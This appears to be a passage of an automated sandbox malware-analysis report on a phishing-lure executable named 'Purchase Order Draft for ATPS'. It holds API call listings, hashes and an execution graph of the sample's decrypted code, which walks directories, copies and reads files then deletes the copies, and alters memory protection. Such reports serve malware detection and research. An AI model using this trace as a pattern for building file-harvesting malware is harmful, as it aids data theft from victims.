                                                              • Instruction Fuzzy Hash: 60F09611B40A1196DF3176544CD5A7776B8EB54350F14823BE702B71C1D3F84C818FEA
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004059DD
                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,00403542), ref: 004059E7
                                                              • lstrcatW.KERNEL32(?,00409014), ref: 004059F9
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 2659869361-4083868402
                                                              • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                              • Instruction ID: 7fac2ab44bb530718b2284b157b2a7f0092c6bde3eeb611d4a5a20073ea11bc0
                                                              • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                              • Instruction Fuzzy Hash: AAD05E61101921AAC21267458C00D9F629CEE86340340042AF101B30A1C77C1D428BFE
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                              • String ID:
                                                              • API String ID: 1404258612-0
                                                              • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                              • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                              • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                              • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                              APIs
                                                                • Part of subcall function 00405F8C: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F99
                                                                • Part of subcall function 00405A82: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,00405AF6,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,75572EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 00405A90
                                                                • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,75572EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"), ref: 00405B38
                                                              • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,C:\Users\user\AppData\Local\Temp\nsu68B6.tmp,?,?,75572EE0,00405834,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00405B48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsu68B6.tmp
                                                              • API String ID: 3248276644-3017966712
                                                              • Opcode ID: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                              • Instruction ID: befbdd5a087c2980586ea2edfffbf9f3f516deffcd0f82c81bc74a8a64b8095a
                                                              • Opcode Fuzzy Hash: d117d0ccab4911199c69acc1ac59bea3cdceced1d455b0aaf4c9d7a527f16456
                                                              • Instruction Fuzzy Hash: 97F0D125208D5259D622323A1C49AAF3954CF82324B59063FB850B22D1DA3CA9439DBE
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 004051D7
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                              • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                              • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                              • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75572EE0,00403861,75573420,0040366C,?), ref: 004038A4
                                                              • GlobalFree.KERNEL32(?), ref: 004038AB
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Free$GlobalLibrary
                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                              • API String ID: 1100898210-4083868402
                                                              • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                              • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                              • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                              • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,80000000,00000003), ref: 00405A29
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe,80000000,00000003), ref: 00405A39
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-1876063424
                                                              • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                              • Instruction ID: 70c70b289df7ad335b0e987d4c8d51b2e295f307612c2b5534f84bbf363d52d8
                                                              • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                              • Instruction Fuzzy Hash: EFD05EA25019209BD322A704DC40D9FA7ACEF513007454866F401A31A0D3785D818EA9
                                                              APIs
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                              • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                              • GlobalFree.KERNEL32(?), ref: 10001203
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2369517507.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2369497623.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369537423.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.2369556194.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Global$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 1780285237-0
                                                              • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                              • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                              • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                              • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                              • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                              • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2359894106.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2359872214.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359917561.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2359942484.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                              • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                              • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                              • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                              Execution Graph

                                                              Execution Coverage:1.8%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:214
                                                              Total number of Limit Nodes:5
                                                              execution_graph 8767 382a1c5b 8768 382a1c6b ___scrt_fastfail 8767->8768 8771 382a12ee 8768->8771 8770 382a1c87 8772 382a1324 ___scrt_fastfail 8771->8772 8773 382a13b7 GetEnvironmentVariableW 8772->8773 8797 382a10f1 8773->8797 8776 382a10f1 57 API calls 8777 382a1465 8776->8777 8778 382a10f1 57 API calls 8777->8778 8779 382a1479 8778->8779 8780 382a10f1 57 API calls 8779->8780 8781 382a148d 8780->8781 8782 382a10f1 57 API calls 8781->8782 8783 382a14a1 8782->8783 8784 382a10f1 57 API calls 8783->8784 8785 382a14b5 lstrlenW 8784->8785 8786 382a14d9 lstrlenW 8785->8786 8787 382a14d2 8785->8787 8788 382a10f1 57 API calls 8786->8788 8787->8770 8789 382a1501 lstrlenW lstrcatW 8788->8789 8790 382a10f1 57 API calls 8789->8790 8791 382a1539 lstrlenW lstrcatW 8790->8791 8792 382a10f1 57 API calls 8791->8792 8793 382a156b lstrlenW lstrcatW 8792->8793 8794 382a10f1 57 API calls 8793->8794 8795 382a159d lstrlenW lstrcatW 8794->8795 8796 382a10f1 57 API calls 8795->8796 8796->8787 8798 382a1118 ___scrt_fastfail 8797->8798 8799 382a1129 lstrlenW 8798->8799 8810 382a2c40 8799->8810 8802 382a1168 lstrlenW 8803 382a1177 lstrlenW FindFirstFileW 8802->8803 8804 382a11a0 8803->8804 8805 382a11e1 8803->8805 8806 382a11aa 8804->8806 8807 382a11c7 FindNextFileW 8804->8807 8805->8776 8806->8807 8812 382a1000 8806->8812 8807->8804 8809 382a11da FindClose 8807->8809 8809->8805 8811 382a1148 lstrcatW lstrlenW 8810->8811 8811->8802 8811->8803 8813 382a1022 ___scrt_fastfail 8812->8813 8814 382a10af 8813->8814 8815 382a102f lstrcatW lstrlenW 8813->8815 8818 382a10b5 lstrlenW 8814->8818 8828 382a10ad 8814->8828 8816 382a105a lstrlenW 8815->8816 8817 382a106b lstrlenW 8815->8817 8816->8817 8829 382a1e89 lstrlenW 8817->8829 8843 382a1e16 8818->8843 8821 382a1088 GetFileAttributesW 8824 382a109c 8821->8824 8821->8828 8822 382a10ca 8823 382a1e89 5 API calls 8822->8823 8822->8828 8825 382a10df 8823->8825 8824->8828 8835 382a173a 8824->8835 8848 382a11ea 8825->8848 8828->8806 8830 382a2c40 ___scrt_fastfail 8829->8830 8831 382a1ea7 lstrcatW lstrlenW 8830->8831 8832 382a1ec2 8831->8832 8833 382a1ed1 lstrcatW 8831->8833 8832->8833 8834 382a1ec7 lstrlenW 8832->8834 8833->8821 8834->8833 8836 382a1747 ___scrt_fastfail 8835->8836 8863 382a1cca 8836->8863 8839 382a199f 8839->8828 8841 382a1824 ___scrt_fastfail _strlen 8841->8839 8883 382a15da 8841->8883 8844 382a1e29 8843->8844 8847 382a1e4c 8843->8847 8845 382a1e2d lstrlenW 8844->8845 8844->8847 8846 382a1e3f lstrlenW 8845->8846 8845->8847 8846->8847 8847->8822 8849 382a120e ___scrt_fastfail 8848->8849 8850 382a1e89 5 API calls 8849->8850 8851 382a1220 GetFileAttributesW 8850->8851 8852 382a1246 8851->8852 8853 382a1235 8851->8853 8854 382a1e89 5 API calls 8852->8854 8853->8852 8856 382a173a 35 API calls 8853->8856 8855 382a1258 8854->8855 8857 382a10f1 56 API calls 8855->8857 8856->8852 8858 382a126d 8857->8858 8859 382a1e89 5 API calls 8858->8859 8860 382a127f ___scrt_fastfail 8859->8860 8861 382a10f1 56 API calls 8860->8861 8862 382a12e6 8861->8862 8862->8828 8864 382a1cf1 ___scrt_fastfail 8863->8864 8865 382a1d0f CopyFileW CreateFileW 8864->8865 8866 382a1d44 DeleteFileW 8865->8866 8867 382a1d55 GetFileSize 8865->8867 8872 382a1808 8866->8872 8868 382a1ede 22 API calls 8867->8868 8869 382a1d66 ReadFile 8868->8869 8870 382a1d7d CloseHandle DeleteFileW 8869->8870 8871 382a1d94 CloseHandle DeleteFileW 8869->8871 8870->8872 8871->8872 8872->8839 8873 382a1ede 8872->8873 8875 382a222f 8873->8875 8876 382a224e 8875->8876 8879 382a2250 8875->8879 8891 382a474f 8875->8891 8896 382a47e5 8875->8896 8876->8841 8878 382a2908 8880 382a35d2 __CxxThrowException@8 RaiseException 8878->8880 8879->8878 8903 382a35d2 8879->8903 8881 382a2925 8880->8881 8881->8841 8884 382a160c _strcat _strlen 8883->8884 8885 382a163c lstrlenW 8884->8885 8991 382a1c9d 8885->8991 8887 382a1655 lstrcatW lstrlenW 8888 382a1678 8887->8888 8889 382a167e lstrcatW 8888->8889 8890 382a1693 ___scrt_fastfail 8888->8890 8889->8890 8890->8841 8906 382a4793 8891->8906 8893 382a4765 8912 382a2ada 8893->8912 8895 382a478f 8895->8875 8901 382a56d0 _abort 8896->8901 8897 382a570e 8925 382a6368 8897->8925 8898 382a56f9 RtlAllocateHeap 8900 382a570c 8898->8900 8898->8901 8900->8875 8901->8897 8901->8898 8902 382a474f _abort 7 API calls 8901->8902 8902->8901 8904 382a35f2 RaiseException 8903->8904 8904->8878 8907 382a479f ___scrt_is_nonwritable_in_current_image 8906->8907 8919 382a5671 RtlEnterCriticalSection 8907->8919 8909 382a47aa 8920 382a47dc 8909->8920 8911 382a47d1 _abort 8911->8893 8913 382a2ae3 8912->8913 8914 382a2ae5 IsProcessorFeaturePresent 8912->8914 8913->8895 8916 382a2b58 8914->8916 8924 382a2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8916->8924 8918 382a2c3b 8918->8895 8919->8909 8923 382a56b9 RtlLeaveCriticalSection 8920->8923 8922 382a47e3 8922->8911 8923->8922 8924->8918 8928 382a5b7a GetLastError 8925->8928 8929 382a5b99 8928->8929 8930 382a5b93 8928->8930 8934 382a5bf0 SetLastError 8929->8934 8954 382a637b 8929->8954 8947 382a5e08 8930->8947 8936 382a5bf9 8934->8936 8935 382a5bb3 8961 382a571e 8935->8961 8936->8900 8940 382a5bcf 8974 382a593c 8940->8974 8941 382a5bb9 8943 382a5be7 SetLastError 8941->8943 8943->8936 8945 382a571e _free 17 API calls 8946 382a5be0 8945->8946 8946->8934 8946->8943 8979 382a5c45 8947->8979 8949 382a5e2f 8950 382a5e47 TlsGetValue 8949->8950 8951 382a5e3b 8949->8951 8950->8951 8952 382a2ada _ValidateLocalCookies 5 API calls 8951->8952 8953 382a5e58 8952->8953 8953->8929 8959 382a6388 _abort 8954->8959 8955 382a63c8 8958 382a6368 __dosmaperr 19 API calls 8955->8958 8956 382a63b3 RtlAllocateHeap 8957 382a5bab 8956->8957 8956->8959 8957->8935 8967 382a5e5e 8957->8967 8958->8957 8959->8955 8959->8956 8960 382a474f _abort 7 API calls 8959->8960 8960->8959 8962 382a5729 HeapFree 8961->8962 8966 382a5752 __dosmaperr 8961->8966 8963 382a573e 8962->8963 8962->8966 8964 382a6368 __dosmaperr 18 API calls 8963->8964 8965 382a5744 GetLastError 8964->8965 8965->8966 8966->8941 8968 382a5c45 _abort 5 API calls 8967->8968 8969 382a5e85 8968->8969 8970 382a5ea0 TlsSetValue 8969->8970 8971 382a5e94 8969->8971 8970->8971 8972 382a2ada _ValidateLocalCookies 5 API calls 8971->8972 8973 382a5bc8 8972->8973 8973->8935 8973->8940 8985 382a5914 8974->8985 8983 382a5c71 8979->8983 8984 382a5c75 __crt_fast_encode_pointer 8979->8984 8980 382a5c95 8982 382a5ca1 GetProcAddress 8980->8982 8980->8984 8981 382a5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8981->8983 8982->8984 8983->8980 8983->8981 8983->8984 8984->8949 8986 382a5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 8985->8986 8987 382a5938 8986->8987 8988 382a58c4 8987->8988 8989 382a5758 _abort 20 API calls 8988->8989 8990 382a58e8 8989->8990 8990->8945 8992 382a1ca6 _strlen 8991->8992 8992->8887 8993 382ac7a7 8994 382ac7be 8993->8994 8998 382ac82c 8993->8998 8994->8998 9005 382ac7e6 GetModuleHandleA 8994->9005 8995 382ac872 8996 382ac835 GetModuleHandleA 8999 382ac83f 8996->8999 8998->8995 8998->8996 8998->8999 8999->8998 9001 382ac85f GetProcAddress 8999->9001 9000 382ac7dd 9000->8998 9000->8999 9002 382ac800 GetProcAddress 9000->9002 9001->8998 9002->8998 9003 382ac80d VirtualProtect 9002->9003 9003->8998 9004 382ac81c VirtualProtect 9003->9004 9004->8998 9006 382ac7ef 9005->9006 9012 382ac82c 9005->9012 9017 382ac803 GetProcAddress 9006->9017 9008 382ac7f4 9011 382ac800 GetProcAddress 9008->9011 9008->9012 9009 382ac872 9010 382ac835 GetModuleHandleA 9015 382ac83f 9010->9015 9011->9012 9013 382ac80d VirtualProtect 9011->9013 9012->9009 9012->9010 9012->9015 9013->9012 9014 382ac81c VirtualProtect 9013->9014 9014->9012 9015->9012 9016 382ac85f GetProcAddress 9015->9016 9016->9012 9018 382ac80d VirtualProtect 9017->9018 9020 382ac82c 9017->9020 9019 382ac81c VirtualProtect 9018->9019 9018->9020 9019->9020 9021 382ac872 9020->9021 9022 382ac835 GetModuleHandleA 9020->9022 9024 382ac83f 9022->9024 9023 382ac85f GetProcAddress 9023->9024 9024->9020 9024->9023

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 382A1137
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 382A1151
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 382A115C
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 382A116D
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 382A117C
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 382A1193
                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 382A11D0
                                                              • FindClose.KERNEL32(00000000), ref: 382A11DB
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
